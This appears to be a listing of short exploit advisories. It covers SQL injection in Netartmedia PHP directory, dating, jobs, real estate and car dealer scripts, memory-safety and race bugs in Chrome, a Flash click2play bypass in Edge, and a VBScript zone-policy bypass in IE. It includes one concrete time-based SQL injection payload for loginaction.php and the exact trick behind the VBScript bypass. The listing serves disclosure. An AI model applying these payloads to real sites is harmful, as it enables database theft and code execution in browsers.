Netartmedia PHP Business Directory 4.2 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a specially crafted payload to the 'Email' parameter in the 'loginaction.php' page. The payload used in this exploit is 'Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login' which will cause the application to sleep for 0 seconds if the current date is equal to the system date.
PHP Dating Site is a complete web system for creating advanced and modern online dating websites. An attacker can exploit a SQL injection vulnerability in the loginaction.php script by sending a malicious payload in the Email parameter.
Netartmedia Jobs Portal 6.1 is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted payload to the loginaction.php page. The payload is sent as a POST parameter in the form of an email address. The payload is designed to cause the application to pause for a period of time, indicating a successful exploitation of the vulnerability.
PHP Real Estate Agency is vulnerable to SQL injection in the 'features[]' parameter of the 'index.php' page. An attacker can exploit this vulnerability to gain access to the underlying database and execute arbitrary SQL queries.
The PHP Car Dealer script is vulnerable to SQL Injection. An attacker can send a malicious payload to the 'features[]' parameter in a POST request to the index.php page, which can be used to inject malicious SQL queries.
MidiManagerWin uses an instance_id mechanism to ensure that delayed tasks are only executed if the MidiManager instance that they were scheduled on is still alive. However, this instance_id is an int, and there is no check that it hasn't overflowed, unlike in the linux and mac implementations (MidiManagerAlsa). This means that if a delayed sendData on a stale MidiManagerWin instance is queued up, and then the instance id is wrapped, this will trigger a use-after-free when that task triggers. A proof of concept is available that demonstrates the issue in a more convenient amount of time for testing.
This PoC bypasses Flash click2play in Microsoft Edge. It was tested on Windows 10 64bit v 1809 with the latest patches applied. The PoC currently loads a swf from wwwimages.adobe.com, but can load a swf from any domain and also the PoC itself can be hosted on any domain. The vulnerability is due to the logic in CObjectElement::FinalCreateObject, which calls COleSite::CreateObject if clsid != CLSID_MacromediaSwFlash or if IsFlashCreateable() returns false, creating the object immediately without performing any additional checks.
MSHTML only checks for the CLSID associated with VBScript when blocking in the Internet Zone, but doesn’t check other VBScript CLSIDs which allow a web page to bypass the security zone policy. According to https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/, Starting from Windows 10 Fall Creators Update, VBScript execution in IE 11 should be disabled for websites in the Internet Zone and the Restricted Sites Zone by default. The check for the VBScript security zone policy is done in MSHTML!AllowVBScript which is only called from MSHTML!CScriptCollection::GetHolderCLSID if the script language CLSID matches {b54f3741-5b07-11cf-a4b0-00aa004a55e8}. However, IE still supports the old VBScript.Encode language which has a slightly different CLSID of {b54f3743-5b07-11cf-a4b0-00aa004a55e8}. Therefore to bypass the VBScript zone security policy it’s possible to just change the language attribute in the HTML from “VBScript” to “VBScript.Encode”. To add insult to injury you don’t even need to encode the VBScript as if the engine detects the script is not encoded it tries to parse it as unencoded script.
There appears to be a race condition in the destruction of the ExtensionsGuestViewMessageFilter if the ProcessIdToFilterMap is modified concurrently. This issue was detected by TSAN during fuzzing, but can be reproduced by spawning lots of renderers. The bug report will become visible to the public after 90 days elapse or a patch has been made broadly available (whichever is earlier).
There is a race condition in the destruction of the BindingState for bindings to the StoragePartitionService. This is caused by two concurrent calls to callbacks returned from mojo::BindingSet::GetBadMessageCallback() from the same BindingSet. This can be called in a synchronous context when validating a received message, or when tearing down the connection. The other context is the callback passed to OpenSessionStorage. The repro is not terribly reliable, but opening multiple tabs at once will increase the chances of reproducing to the point where the issue triggers around 50% of the time.
Services By CQR